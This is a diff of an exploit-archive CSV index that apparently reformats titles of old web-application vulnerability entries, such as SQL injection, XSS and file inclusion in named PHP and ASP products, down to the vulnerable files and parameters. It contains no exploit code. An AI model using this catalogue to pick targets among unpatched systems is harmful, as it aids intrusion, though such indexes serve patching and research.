Inclusion",2006-02-14,r.verton,php,webapps,0 +27223,platforms/php/webapps/27223.txt,"dotProject 2.0 - '/modules/public/calendar.php' 'baseDir' Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 +27224,platforms/php/webapps/27224.txt,"dotProject 2.0 - '/modules/public/date_format.php' 'baseDir' Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 +27225,platforms/php/webapps/27225.txt,"dotProject 2.0 - '/modules/tasks/gantt.php' 'baseDir' Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 27226,platforms/php/webapps/27226.txt,"RunCMS 1.2/1.3 - 'PMLite.php' SQL Injection",2006-02-14,"Hamid Ebadi",php,webapps,0 27227,platforms/php/webapps/27227.txt,"WordPress 2.0 - Comment Post HTML Injection",2006-02-15,imei,php,webapps,0 27228,platforms/php/webapps/27228.txt,"Mantis 0.x/1.0 - view_all_set.php Multiple Parameter Cross-Site Scripting",2006-02-15,"Thomas Waldegger",php,webapps,0 27229,platforms/php/webapps/27229.txt,"Mantis 0.x/1.0 - manage_user_page.php sort Parameter Cross-Site Scripting",2006-02-15,"Thomas Waldegger",php,webapps,0 27230,platforms/php/webapps/27230.txt,"My Blog 1.63 - BBCode HTML Injection",2006-02-15,"Aliaksandr Hartsuyeu",php,webapps,0 -27236,platforms/php/webapps/27236.txt,"MyBB 1.0.3 - private.php Multiple SQL Injection",2006-02-15,imei,php,webapps,0 +27236,platforms/php/webapps/27236.txt,"MyBB 1.0.3 - 'private.php' Multiple SQL Injections",2006-02-15,imei,php,webapps,0 27237,platforms/php/webapps/27237.txt,"HTML::BBCode 1.03/1.04 - HTML Injection",2006-02-15,"Aliaksandr Hartsuyeu",php,webapps,0 27238,platforms/php/webapps/27238.php,"Dreamcost HostAdmin 3.0 - 'index.php' Remote File Inclusion",2006-02-16,ReZEN,php,webapps,0 27239,platforms/php/webapps/27239.txt,"BirthSys 3.1 - Multiple SQL Injections",2006-02-15,"Aliaksandr Hartsuyeu",php,webapps,0 @@ -29390,11 +29401,11 @@ id,file,description,date,author,platform,type,port 27495,platforms/php/webapps/27495.txt,"PHPCOIN 1.2 - mod_print.php fs Parameter Cross-Site Scripting",2006-03-28,r0t,php,webapps,0 27496,platforms/php/webapps/27496.txt,"PHPCOIN 1.2 - mod.php fs Parameter Cross-Site Scripting",2006-03-28,r0t,php,webapps,0 27272,platforms/php/webapps/27272.txt,"SocialEngine Timeline Plugin 4.2.5p9 - Arbitrary File Upload",2013-08-02,spyk2r,php,webapps,0 -27274,platforms/php/webapps/27274.txt,"Ginkgo CMS - 'index.php rang Parameter' SQL Injection",2013-08-02,Raw-x,php,webapps,0 +27274,platforms/php/webapps/27274.txt,"Ginkgo CMS - 'index.php' 'rang' Parameter SQL Injection",2013-08-02,Raw-x,php,webapps,0 27275,platforms/php/webapps/27275.txt,"FunGamez - Arbitrary File Upload",2013-08-02,cr4wl3r,php,webapps,0 27276,platforms/php/webapps/27276.html,"BigACE 2.7.8 - Cross-Site Request Forgery (Add Admin)",2013-08-02,"Yashar shahinzadeh",php,webapps,0 27279,platforms/php/webapps/27279.txt,"vtiger CRM 5.4.0 (SOAP Services) - Multiple Vulnerabilities",2013-08-02,EgiX,php,webapps,0 -27281,platforms/php/webapps/27281.txt,"Telmanik CMS Press 1.01b - 'pages.php page_name Parameter' SQL Injection",2013-08-02,"Anarchy Angel",php,webapps,0 +27281,platforms/php/webapps/27281.txt,"Telmanik CMS Press 1.01b - 'pages.php' 'page_name' Parameter SQL Injection",2013-08-02,"Anarchy Angel",php,webapps,0 27283,platforms/hardware/webapps/27283.txt,"D-Link DIR-645 1.03B08 - Multiple Vulnerabilities",2013-08-02,"Roberto Paleari",hardware,webapps,0 27284,platforms/hardware/webapps/27284.txt,"INSTEON Hub 2242-222 - Lack of Web and API Authentication",2013-08-02,"Trustwave's SpiderLabs",hardware,webapps,0 27286,platforms/hardware/webapps/27286.txt,"MiCasaVerde VeraLite 1.5.408 - Multiple Vulnerabilities",2013-08-02,"Trustwave's SpiderLabs",hardware,webapps,0 @@ -29418,8 +29429,8 @@ id,file,description,date,author,platform,type,port 27310,platforms/asp/webapps/27310.txt,"Battleaxe Software BttlxeForum 2.0 - Failure.asp Cross-Site Scripting",2006-02-25,rUnViRuS,asp,webapps,0 27311,platforms/php/webapps/27311.txt,"SPiD 1.3.1 - Scan_Lang_Insert.php Local File Inclusion",2006-02-25,"NSA Group",php,webapps,0 27312,platforms/php/webapps/27312.txt,"FreeHostShop Website Generator 3.3 - Arbitrary File Upload",2006-02-25,"NSA Group",php,webapps,0 -27313,platforms/php/webapps/27313.txt,"DCI-Taskeen 1.03 - basket.php Multiple Parameter SQL Injection",2006-02-25,Linux_Drox,php,webapps,0 -27314,platforms/php/webapps/27314.txt,"DCI-Taskeen 1.03 - cat.php Multiple Parameter SQL Injection",2006-02-25,Linux_Drox,php,webapps,0 +27313,platforms/php/webapps/27313.txt,"DCI-Taskeen 1.03 - 'basket.php' Multiple Parameter SQL Injections",2006-02-25,Linux_Drox,php,webapps,0 +27314,platforms/php/webapps/27314.txt,"DCI-Taskeen 1.03 - 'cat.php' Multiple Parameter SQL Injections",2006-02-25,Linux_Drox,php,webapps,0 27315,platforms/php/webapps/27315.txt,"RiteCMS 1.0.0 - Multiple Vulnerabilities",2013-08-03,"Yashar shahinzadeh",php,webapps,0 27318,platforms/php/webapps/27318.txt,"PHP-Nuke 7.8 - Mainfile.php SQL Injection",2006-02-25,waraxe,php,webapps,0 27321,platforms/php/webapps/27321.txt,"Fantastic News 2.1.1 - SQL Injection",2006-02-27,SAUDI,php,webapps,0 @@ -29458,8 +29469,8 @@ id,file,description,date,author,platform,type,port 27371,platforms/php/webapps/27371.txt,"HitHost 1.0 - deleteuser.php user Parameter Cross-Site Scripting",2006-03-06,Retard,php,webapps,0 27372,platforms/php/webapps/27372.txt,"HitHost 1.0 - viewuser.php hits Parameter Cross-Site Scripting",2006-03-06,Retard,php,webapps,0 27373,platforms/php/webapps/27373.txt,"TextFileBB 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2006-03-08,Retard,php,webapps,0 -27374,platforms/php/webapps/27374.txt,"sBlog 0.7.2 - search.php keyword Variable POST Method Cross-Site Scripting",2006-03-09,Kiki,php,webapps,0 -27375,platforms/php/webapps/27375.txt,"sBlog 0.7.2 - comments_do.php Multiple Variable POST Method Cross-Site Scripting",2006-03-09,Kiki,php,webapps,0 +27374,platforms/php/webapps/27374.txt,"sBlog 0.7.2 - 'search.php' 'keyword' Parameter POST Method Cross-Site Scripting",2006-03-09,Kiki,php,webapps,0 +27375,platforms/php/webapps/27375.txt,"sBlog 0.7.2 - 'comments_do.php' Multiple Variable POST Method Cross-Site Scripting",2006-03-09,Kiki,php,webapps,0 27376,platforms/ios/webapps/27376.txt,"FTP OnConnect 1.4.11 iOS - Multiple Vulnerabilities",2013-08-07,Vulnerability-Lab,ios,webapps,0 27379,platforms/php/webapps/27379.txt,"ADP Forum 2.0.x - Subject Field HTML Injection",2006-03-09,liz0,php,webapps,0 27380,platforms/php/webapps/27380.txt,"MyBloggie 2.1.2/2.1.3 - 'upload.php' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0 @@ -29500,7 +29511,7 @@ id,file,description,date,author,platform,type,port 27423,platforms/php/webapps/27423.txt,"DSCounter 1.2 - 'index.php' SQL Injection",2006-03-14,"Aliaksandr Hartsuyeu",php,webapps,0 27424,platforms/php/webapps/27424.txt,"DSDownload 1.0 - Multiple SQL Injections",2006-03-15,"Aliaksandr Hartsuyeu",php,webapps,0 27427,platforms/php/webapps/27427.txt,"Contrexx CMS 1.0.x - 'index.php' Cross-Site Scripting",2006-03-16,Soot,php,webapps,0 -27430,platforms/php/webapps/27430.txt,"PHPFox 3.6.0 (build3) - Multiple SQL Injection",2013-08-08,"Matias Fontanini",php,webapps,0 +27430,platforms/php/webapps/27430.txt,"PHPFox 3.6.0 (build3) - Multiple SQL Injections",2013-08-08,"Matias Fontanini",php,webapps,0 27431,platforms/php/webapps/27431.txt,"BigTree CMS 4.0 RC2 - Multiple Vulnerabilities",2013-08-08,"High-Tech Bridge SA",php,webapps,0 27991,platforms/php/webapps/27991.txt,"PostNuke 0.76 RC2 - Multiple Input Validation Vulnerabilities",2006-06-07,SpC-x,php,webapps,0 27990,platforms/php/webapps/27990.txt,"Calendar Express 2.2 - month.php SQL Injection",2006-06-07,"CrAzY CrAcKeR",php,webapps,0 @@ -29512,7 +29523,7 @@ id,file,description,date,author,platform,type,port 27448,platforms/php/webapps/27448.txt,"phpWebSite 0.8.2/0.8.3 - friend.php sid Parameter SQL Injection",2006-03-20,DaBDouB-MoSiKaR,php,webapps,0 27449,platforms/php/webapps/27449.txt,"phpWebSite 0.8.2/0.8.3 - article.php sid Parameter SQL Injection",2006-03-20,DaBDouB-MoSiKaR,php,webapps,0 27450,platforms/php/webapps/27450.txt,"WinHKI 1.4/1.5/1.6 - Directory Traversal",2006-02-24,raphael.huck@free.fr,php,webapps,0 -27451,platforms/cgi/webapps/27451.txt,"Verisign MPKI 6.0 - Haydn.exe Cross-Site Scripting",2006-03-20,"Alberto Soli",cgi,webapps,0 +27451,platforms/cgi/webapps/27451.txt,"Verisign MPKI 6.0 - 'Haydn.exe' Cross-Site Scripting",2006-03-20,"Alberto Soli",cgi,webapps,0 27454,platforms/php/webapps/27454.txt,"Motorola - BlueTooth Interface Dialog Spoofing",2006-03-22,kspecial,php,webapps,0 27455,platforms/cfm/webapps/27455.txt,"1WebCalendar 4.0 - viewEvent.cfm EventID Parameter SQL Injection",2006-03-22,r0t3d3Vil,cfm,webapps,0 27456,platforms/cfm/webapps/27456.txt,"1WebCalendar 4.0 - '/news/newsView.cfm' NewsID Parameter SQL Injection",2006-03-22,r0t3d3Vil,cfm,webapps,0 @@ -29540,7 +29551,7 @@ id,file,description,date,author,platform,type,port 27482,platforms/asp/webapps/27482.txt,"Caloris Planitia Technologies School Management System 1.0 - Cross-Site Scripting",2006-03-27,r0t,asp,webapps,0 27483,platforms/php/webapps/27483.txt,"Pixel Motion - admin/index.php Multiple Field SQL Injection",2006-03-27,DaBDouB-MoSiKaR,php,webapps,0 27484,platforms/php/webapps/27484.txt,"Pixel Motion - 'index.php' date Parameter SQL Injection",2006-03-27,DaBDouB-MoSiKaR,php,webapps,0 -27485,platforms/php/webapps/27485.txt,"DSLogin 1.0 - 'index.php' Multiple SQL Injection",2006-03-27,"Aliaksandr Hartsuyeu",php,webapps,0 +27485,platforms/php/webapps/27485.txt,"DSLogin 1.0 - 'index.php' Multiple SQL Injections",2006-03-27,"Aliaksandr Hartsuyeu",php,webapps,0 27486,platforms/asp/webapps/27486.txt,"Web Host Automation Ltd. Helm 3.2.10 Beta - domains.asp txtDomainName Parameter Cross-Site Scripting",2006-03-27,r0t,asp,webapps,0 27487,platforms/asp/webapps/27487.txt,"Web Host Automation Ltd. Helm 3.2.10 Beta - default.asp Multiple Parameter Cross-Site Scripting",2006-03-27,r0t,asp,webapps,0 27488,platforms/cgi/webapps/27488.txt,"BlankOL 1.0 - Bol.cgi Multiple Cross-Site Scripting Vulnerabilities",2006-03-27,r0t,cgi,webapps,0 @@ -29567,7 +29578,7 @@ id,file,description,date,author,platform,type,port 27513,platforms/php/webapps/27513.txt,"VNews 1.2 - Multiple SQL Injections",2006-03-30,"Aliaksandr Hartsuyeu",php,webapps,0 27514,platforms/php/webapps/27514.txt,"Tribq CMS 5.2.7 - Cross-Site Request Forgery (Adding/Editing New Administrator Account)",2013-08-12,"Yashar shahinzadeh",php,webapps,0 27515,platforms/php/webapps/27515.txt,"Open Real Estate CMS 1.5.1 - Multiple Vulnerabilities",2013-08-12,"Yashar shahinzadeh",php,webapps,0 -27518,platforms/php/webapps/27518.txt,"MLMAuction Script - 'gallery.php id Parameter' SQL Injection",2013-08-12,3spi0n,php,webapps,0 +27518,platforms/php/webapps/27518.txt,"MLMAuction Script - 'gallery.php' 'id' Parameter SQL Injection",2013-08-12,3spi0n,php,webapps,0 27519,platforms/php/webapps/27519.txt,"PHPVID 1.2.3 - Multiple Vulnerabilities",2013-08-12,3spi0n,php,webapps,0 27729,platforms/php/webapps/27729.txt,"Scry Gallery 1.1 - 'index.php' Cross-Site Scripting",2006-04-24,mayank,php,webapps,0 27521,platforms/php/webapps/27521.txt,"Ajax PHP Penny Auction 1.x 2.x - Multiple Vulnerabilities",2013-08-12,"Taha Hunter",php,webapps,80 @@ -29613,11 +29624,11 @@ id,file,description,date,author,platform,type,port 27583,platforms/cgi/webapps/27583.txt,"TalentSoft Web+ Shop 5.0 - Deptname Parameter Cross-Site Scripting",2006-04-07,r0t,cgi,webapps,0 27584,platforms/php/webapps/27584.txt,"JBook 1.3 - 'index.php' Cross-Site Scripting",2006-04-10,Psych0,php,webapps,0 27585,platforms/php/webapps/27585.txt,"PHPMyForum 4.0 - 'page' Parameter Cross-Site Scripting",2006-04-10,Psych0,php,webapps,0 -27586,platforms/php/webapps/27586.txt,"PHPMyForum 4.0 - 'index.php' type Variable CRLF Injection",2006-04-10,Psych0,php,webapps,0 +27586,platforms/php/webapps/27586.txt,"PHPMyForum 4.0 - 'index.php' 'type' Parameter CRLF Injection",2006-04-10,Psych0,php,webapps,0 27587,platforms/php/webapps/27587.txt,"PHPWebGallery 1.4.1 - 'category.php' Cross-Site Scripting",2006-04-10,Psych0,php,webapps,0 27588,platforms/php/webapps/27588.txt,"PHPWebGallery 1.4.1 - 'picture.php' Cross-Site Scripting",2006-04-10,Psych0,php,webapps,0 27589,platforms/php/webapps/27589.txt,"SPIP 1.8.3 - Spip_login.php Remote File Inclusion",2006-04-10,cR45H3R,php,webapps,0 -27590,platforms/php/webapps/27590.txt,"APT-webshop 3.0/4.0 - modules.php Multiple SQL Injection",2005-04-10,r0t,php,webapps,0 +27590,platforms/php/webapps/27590.txt,"APT-webshop 3.0/4.0 - modules.php Multiple SQL Injections",2005-04-10,r0t,php,webapps,0 27591,platforms/php/webapps/27591.txt,"Shadowed Portal 5.7 - Load.php Cross-Site Scripting",2006-04-10,Liz0ziM,php,webapps,0 27592,platforms/php/webapps/27592.txt,"SIRE 2.0 - Arbitrary File Upload",2006-04-10,simo64,php,webapps,0 27593,platforms/php/webapps/27593.txt,"VegaDNS 0.9.9 - 'index.php' cid Parameter SQL Injection",2006-04-10,Ph03n1X,php,webapps,0 @@ -29703,8 +29714,8 @@ id,file,description,date,author,platform,type,port 28055,platforms/hardware/webapps/28055.txt,"TP-Link TD-W8951ND - Multiple Vulnerabilities",2013-09-03,xistence,hardware,webapps,0 28057,platforms/php/webapps/28057.txt,"Cline Communications - Multiple SQL Injections",2006-06-17,Liz0ziM,php,webapps,0 28058,platforms/php/webapps/28058.txt,"Eduha Meeting - 'index.php' Arbitrary File Upload",2006-06-19,Liz0ziM,php,webapps,0 -28061,platforms/asp/webapps/28061.txt,"Cisco CallManager 3.x/4.x - Web Interface ccmadmin/phonelist.asp pattern Parameter Cross-Site Scripting",2006-06-19,"Jake Reynolds",asp,webapps,0 -28062,platforms/asp/webapps/28062.txt,"Cisco CallManager 3.x/4.x - Web Interface ccmuser/logon.asp Cross-Site Scripting",2006-06-19,"Jake Reynolds",asp,webapps,0 +28061,platforms/asp/webapps/28061.txt,"Cisco CallManager 3.x/4.x - Web Interface 'ccmadmin/phonelist.asp' Pattern Parameter Cross-Site Scripting",2006-06-19,"Jake Reynolds",asp,webapps,0 +28062,platforms/asp/webapps/28062.txt,"Cisco CallManager 3.x/4.x - Web Interface 'ccmuser/logon.asp' Cross-Site Scripting",2006-06-19,"Jake Reynolds",asp,webapps,0 28700,platforms/php/webapps/28700.txt,"CubeCart 3.0.x - view_order.php order_id Parameter Cross-Site Scripting",2006-09-26,"HACKERS PAL",php,webapps,0 28053,platforms/hardware/webapps/28053.txt,"Zoom Telephonics ADSL Modem/Router - Multiple Vulnerabilities",2013-09-03,"Kyle Lovett",hardware,webapps,0 28054,platforms/php/webapps/28054.txt,"WordPress Plugin IndiaNIC Testimonial - Multiple Vulnerabilities",2013-09-03,RogueCoder,php,webapps,0 @@ -29779,10 +29790,10 @@ id,file,description,date,author,platform,type,port 27798,platforms/php/webapps/27798.txt,"GeoBlog MOD_1.0 - viewcat.php Cross-Site Scripting",2006-05-02,SubjectZero,php,webapps,0 27799,platforms/php/webapps/27799.txt,"Virtual Hosting Control System 2.4.7.1 - Server_day_stats.php Multiple Cross-Site Scripting Vulnerabilities",2006-05-02,O.U.T.L.A.W,php,webapps,0 27800,platforms/php/webapps/27800.txt,"Pinnacle Cart 3.3 - 'index.php' Cross-Site Scripting",2006-05-02,r0t,php,webapps,0 -27803,platforms/php/webapps/27803.txt,"321soft PHP-Gallery 0.9 - 'index.php' path Variable Arbitrary Directory Listing",2006-05-03,d4igoro,php,webapps,0 +27803,platforms/php/webapps/27803.txt,"321soft PHP-Gallery 0.9 - 'index.php' 'path' Parameter Arbitrary Directory Listing",2006-05-03,d4igoro,php,webapps,0 27804,platforms/php/webapps/27804.txt,"321soft PHP-Gallery 0.9 - 'index.php' path Parameter Cross-Site Scripting",2006-05-03,d4igoro,php,webapps,0 27807,platforms/php/webapps/27807.txt,"Fast Click SQL Lite 1.1.2/1.1.3 - 'show.php' Remote File Inclusion",2006-05-03,R@1D3N,php,webapps,0 -27808,platforms/php/webapps/27808.txt,"Pacheckbook 1.1 - 'index.php' Multiple SQL Injection",2006-05-03,almaster,php,webapps,0 +27808,platforms/php/webapps/27808.txt,"Pacheckbook 1.1 - 'index.php' Multiple SQL Injections",2006-05-03,almaster,php,webapps,0 27809,platforms/php/webapps/27809.txt,"MyNews 1.6.2 - Multiple Cross-Site Scripting Vulnerabilities",2006-05-03,DreamLord,php,webapps,0 27810,platforms/php/webapps/27810.txt,"Albinator 2.0.8 - dlisting.php cid Parameter Cross-Site Scripting",2006-05-02,r0t,php,webapps,0 27811,platforms/php/webapps/27811.txt,"Albinator 2.0.8 - showpic.php preloadSlideShow Parameter Cross-Site Scripting",2006-05-02,r0t,php,webapps,0 @@ -29807,11 +29818,11 @@ id,file,description,date,author,platform,type,port 27832,platforms/php/webapps/27832.txt,"Creative Software UK Community Portal 1.1 - DiscView.php forum_id Parameter SQL Injection",2006-05-08,r0t,php,webapps,0 27833,platforms/php/webapps/27833.txt,"Creative Software UK Community Portal 1.1 - Discussions.php forum_id Parameter SQL Injection",2006-05-08,r0t,php,webapps,0 27834,platforms/php/webapps/27834.txt,"Creative Software UK Community Portal 1.1 - EventView.php event_id Parameter SQL Injection",2006-05-08,r0t,php,webapps,0 -27835,platforms/php/webapps/27835.txt,"Creative Software UK Community Portal 1.1 - PollResults.php Multiple Parameter SQL Injection",2006-05-08,r0t,php,webapps,0 +27835,platforms/php/webapps/27835.txt,"Creative Software UK Community Portal 1.1 - 'PollResults.php' Multiple Parameter SQL Injections",2006-05-08,r0t,php,webapps,0 27836,platforms/php/webapps/27836.txt,"Creative Software UK Community Portal 1.1 - DiscReply.php mid Parameter SQL Injection",2006-05-08,r0t,php,webapps,0 -27837,platforms/php/webapps/27837.txt,"EvoTopsite 2.0 - 'index.php' Multiple SQL Injection",2006-05-08,"Hamid Ebadi",php,webapps,0 -27838,platforms/php/webapps/27838.txt,"timobraun Dynamic Galerie 1.0 - 'index.php' pfad Variable Arbitrary Directory Listing",2006-05-08,d4igoro,php,webapps,0 -27839,platforms/php/webapps/27839.txt,"timobraun Dynamic Galerie 1.0 - galerie.php pfad Variable Arbitrary Directory Listing",2006-05-08,d4igoro,php,webapps,0 +27837,platforms/php/webapps/27837.txt,"EvoTopsite 2.0 - 'index.php' Multiple SQL Injections",2006-05-08,"Hamid Ebadi",php,webapps,0 +27838,platforms/php/webapps/27838.txt,"timobraun Dynamic Galerie 1.0 - 'index.php' 'pfad' Parameter Arbitrary Directory Listing",2006-05-08,d4igoro,php,webapps,0 +27839,platforms/php/webapps/27839.txt,"timobraun Dynamic Galerie 1.0 - 'galerie.php' 'pfad' Parameter Arbitrary Directory Listing",2006-05-08,d4igoro,php,webapps,0 27840,platforms/php/webapps/27840.txt,"timobraun Dynamic Galerie 1.0 - 'index.php' pfad Parameter Cross-Site Scripting",2006-05-08,d4igoro,php,webapps,0 27841,platforms/php/webapps/27841.txt,"timobraun Dynamic Galerie 1.0 - galerie.php id Parameter Cross-Site Scripting",2006-05-08,d4igoro,php,webapps,0 27842,platforms/asp/webapps/27842.txt,"MultiCalendars 3.0 - All_calendars.asp SQL Injection",2006-05-09,Dj_Eyes,asp,webapps,0 @@ -29828,7 +29839,7 @@ id,file,description,date,author,platform,type,port 27864,platforms/php/webapps/27864.txt,"Gphotos 1.4/1.5 - 'index.php' rep Parameter Cross-Site Scripting",2006-05-13,"Morocco Security Team",php,webapps,0 27865,platforms/php/webapps/27865.txt,"Gphotos 1.4/1.5 - diapo.php rep Parameter Cross-Site Scripting",2006-05-13,"Morocco Security Team",php,webapps,0 27866,platforms/php/webapps/27866.txt,"Gphotos 1.4/1.5 - affich.php image Parameter Cross-Site Scripting",2006-05-13,"Morocco Security Team",php,webapps,0 -27867,platforms/php/webapps/27867.txt,"Gphotos 1.4/1.5 - 'index.php' rep Variable Traversal Arbitrary Directory Listing",2006-05-13,"Morocco Security Team",php,webapps,0 +27867,platforms/php/webapps/27867.txt,"Gphotos 1.4/1.5 - 'index.php' 'rep' Parameter Traversal Arbitrary Directory Listing",2006-05-13,"Morocco Security Team",php,webapps,0 27868,platforms/php/webapps/27868.txt,"Pixaria PopPhoto 3.5.4 - CFG[popphoto_base_path] Parameter Remote File Inclusion",2006-05-15,VietMafia,php,webapps,0 27869,platforms/php/webapps/27869.txt,"PHP Script Tools PSY Auction - item.php id Parameter SQL Injection",2006-05-15,Luny,php,webapps,0 27870,platforms/php/webapps/27870.txt,"PHP Script Tools PSY Auction - email_request.php user_id Parameter Cross-Site Scripting",2006-05-15,Luny,php,webapps,0 @@ -29860,7 +29871,7 @@ id,file,description,date,author,platform,type,port 27910,platforms/php/webapps/27910.txt,"AR-Blog 5.2 - Multiple Cross-Site Scripting Vulnerabilities",2006-05-27,black-code,php,webapps,0 27911,platforms/php/webapps/27911.txt,"vCard 2.9 - Multiple Cross-Site Scripting Vulnerabilities",2006-03-11,black-code,php,webapps,0 27912,platforms/php/webapps/27912.txt,"CoolPHP - 'index.php' Cross-Site Scripting",2006-05-27,black-code,php,webapps,0 -27913,platforms/asp/webapps/27913.txt,"Mini-NUKE 2.3 - Your_Account.asp Multiple SQL Injection",2006-05-29,"Mustafa Can Bjorn",asp,webapps,0 +27913,platforms/asp/webapps/27913.txt,"Mini-NUKE 2.3 - 'Your_Account.asp' Multiple SQL Injections",2006-05-29,"Mustafa Can Bjorn",asp,webapps,0 27916,platforms/php/webapps/27916.txt,"Photoalbum B&W 1.3 - 'index.php' Cross-Site Scripting",2006-05-29,black-code,php,webapps,0 27917,platforms/php/webapps/27917.txt,"TikiWiki 1.9 - tiki-lastchanges.php Multiple Parameter Cross-Site Scripting",2006-05-29,Blwood,php,webapps,0 27918,platforms/asp/webapps/27918.txt,"ASPBB 0.5.2 - Perform_search.asp Cross-Site Scripting",2006-05-29,"Mustafa Can Bjorn",asp,webapps,0 @@ -29997,7 +30008,7 @@ id,file,description,date,author,platform,type,port 28122,platforms/php/webapps/28122.txt,"vCard PRO - search.php event_id Parameter SQL Injection",2006-06-19,"CrAzY CrAcKeR",php,webapps,0 28124,platforms/php/webapps/28124.pl,"MKPortal 1.0.1 - 'index.php' Directory Traversal",2006-06-28,rUnViRuS,php,webapps,0 28125,platforms/php/webapps/28125.txt,"PHPClassifieds.Info - Multiple Input Validation Vulnerabilities",2006-06-28,Luny,php,webapps,0 -28126,platforms/php/webapps/28126.rb,"Woltlab Burning Board FLVideo Addon - 'video.php value Parameter' SQL Injection",2013-09-06,"Easy Laster",php,webapps,0 +28126,platforms/php/webapps/28126.rb,"Woltlab Burning Board FLVideo Addon - 'video.php' 'value' Parameter SQL Injection",2013-09-06,"Easy Laster",php,webapps,0 28129,platforms/php/webapps/28129.txt,"Practico CMS 13.7 - Authentication Bypass",2013-09-06,shiZheni,php,webapps,0 28131,platforms/php/webapps/28131.txt,"PHP ICalender 2.22 - 'index.php' Cross-Site Scripting",2006-06-29,"Kurdish Security",php,webapps,0 28132,platforms/php/webapps/28132.txt,"newsPHP 2006 PRO - 'index.php' Multiple Parameter Cross-Site Scripting",2006-06-29,securityconnection,php,webapps,0 @@ -30041,7 +30052,7 @@ id,file,description,date,author,platform,type,port 28179,platforms/php/webapps/28179.txt,"ATutor 1.5.x - 'users/browse.php' cat Parameter Cross-Site Scripting",2006-07-06,"Security News",php,webapps,0 28180,platforms/php/webapps/28180.txt,"ATutor 1.5.x - admin/fix_content.php submit Parameter Cross-Site Scripting",2006-07-06,"Security News",php,webapps,0 28184,platforms/hardware/webapps/28184.txt,"D-Link DIR-505 1.06 - Multiple Vulnerabilities",2013-09-10,"Alessandro Di Pinto",hardware,webapps,0 -28185,platforms/php/webapps/28185.txt,"glFusion 1.3.0 - 'search.php cat_id Parameter' SQL Injection",2013-09-10,"Omar Kurt",php,webapps,0 +28185,platforms/php/webapps/28185.txt,"glFusion 1.3.0 - 'search.php' 'cat_id' Parameter SQL Injection",2013-09-10,"Omar Kurt",php,webapps,0 28190,platforms/php/webapps/28190.txt,"Extcalendar 2.0 - Extcalendar.php Remote File Inclusion",2006-07-07,Matdhule,php,webapps,0 28191,platforms/php/webapps/28191.txt,"AjaXplorer 1.0 - Multiple Vulnerabilities",2013-09-10,"Trustwave's SpiderLabs",php,webapps,0 28192,platforms/php/webapps/28192.txt,"ATutor 1.5.3 - Multiple Input Validation Vulnerabilities",2006-07-08,securityconnection,php,webapps,0 @@ -30073,12 +30084,12 @@ id,file,description,date,author,platform,type,port 28247,platforms/php/webapps/28247.txt,"IDevSpot PHPLinkExchange 1.0 - 'index.php' Remote File Inclusion",2006-07-20,r0t,php,webapps,0 28248,platforms/php/webapps/28248.txt,"IDevSpot PHPHostBot 1.0 - 'index.php' Remote File Inclusion",2006-07-20,r0t,php,webapps,0 28249,platforms/php/webapps/28249.txt,"GeoAuctions 1.0.6 Enterprise - 'index.php' d Parameter SQL Injection",2006-07-20,LBDT,php,webapps,0 -28250,platforms/php/webapps/28250.txt,"Geodesic Solutions Multiple Products - 'index.php' b Parameter SQL Injection",2006-07-20,LBDT,php,webapps,0 +28250,platforms/php/webapps/28250.txt,"Geodesic Solutions Multiple Products - 'index.php' 'b' Parameter SQL Injection",2006-07-20,LBDT,php,webapps,0 28251,platforms/php/webapps/28251.txt,"MiniBB 1.5 - 'news.php' Remote File Inclusion",2006-07-20,AG-Spider,php,webapps,0 28253,platforms/php/webapps/28253.txt,"Advanced Poll 2.0.2 - common.inc.php Remote File Inclusion",2006-07-21,Solpot,php,webapps,0 28255,platforms/php/webapps/28255.txt,"Chameleon LE 1.203 - 'index.php' Directory Traversal",2006-07-21,kicktd,php,webapps,0 28260,platforms/php/webapps/28260.txt,"Lussumo Vanilla 1.0 - RootDirectory Remote File Inclusion",2006-07-24,MFox,php,webapps,0 -28261,platforms/php/webapps/28261.txt,"RadScripts - a_editpage.php Filename Variable Arbitrary File Overwrite",2006-07-24,INVENT,php,webapps,0 +28261,platforms/php/webapps/28261.txt,"RadScripts - 'a_editpage.php' 'Filename' Parameter Arbitrary File Overwrite",2006-07-24,INVENT,php,webapps,0 28262,platforms/php/webapps/28262.txt,"MusicBox 2.3.4 - 'page' Parameter SQL Injection",2006-07-24,"EllipSiS Security",php,webapps,0 28264,platforms/php/webapps/28264.txt,"Prince Clan Chess Club 0.8 - Include.PCchess.php Remote File Inclusion",2006-07-24,OLiBekaS,php,webapps,0 28267,platforms/php/webapps/28267.txt,"LinksCaffe 3.0 - links.php Multiple Parameter SQL Injection",2006-07-25,simo64,php,webapps,0 @@ -30107,7 +30118,7 @@ id,file,description,date,author,platform,type,port 28304,platforms/php/webapps/28304.txt,"X-Scripts X-Poll 1.10 - top.php SQL Injection",2006-07-29,SirDarckCat,php,webapps,0 28305,platforms/php/webapps/28305.txt,"Ajax Chat 0.1 - operator_chattranscript.php chatid Parameter Traversal Arbitrary File Access",2006-07-31,SirDarckCat,php,webapps,0 28306,platforms/php/webapps/28306.txt,"Banex PHP MySQL Banner Exchange 2.21 - signup.php site_name Parameter SQL Injection",2006-07-31,SirDarckCat,php,webapps,0 -28307,platforms/php/webapps/28307.txt,"Banex PHP MySQL Banner Exchange 2.21 - admin.php Multiple Parameter SQL Injection",2006-07-31,SirDarckCat,php,webapps,0 +28307,platforms/php/webapps/28307.txt,"Banex PHP MySQL Banner Exchange 2.21 - 'admin.php' Multiple Parameter SQL Injections",2006-07-31,SirDarckCat,php,webapps,0 28308,platforms/php/webapps/28308.txt,"Banex PHP MySQL Banner Exchange 2.21 - members.php cfg_root Parameter Remote File Inclusion",2006-07-31,SirDarckCat,php,webapps,0 28309,platforms/php/webapps/28309.txt,"Seir Anphin V666 Community Management System - Multiple SQL Injections",2006-07-31,CR,php,webapps,0 28310,platforms/php/webapps/28310.txt,"Moskool 1.5 Component - Admin.Moskool.php Remote File Inclusion",2006-07-31,saudi.unix,php,webapps,0 @@ -30130,7 +30141,7 @@ id,file,description,date,author,platform,type,port 28340,platforms/multiple/webapps/28340.c,"PSWD.JS - Insecure Password Hash",2006-08-03,"Gianstefano Monni",multiple,webapps,0 28342,platforms/php/webapps/28342.txt,"vBulletin 3.0.14 - global.php Encoded URL Cross-Site Scripting",2006-08-05,imei,php,webapps,0 28509,platforms/php/webapps/28509.txt,"XHP CMS 0.5.1 - 'index.php' Cross-Site Scripting",2006-09-11,"HACKERS PAL",php,webapps,0 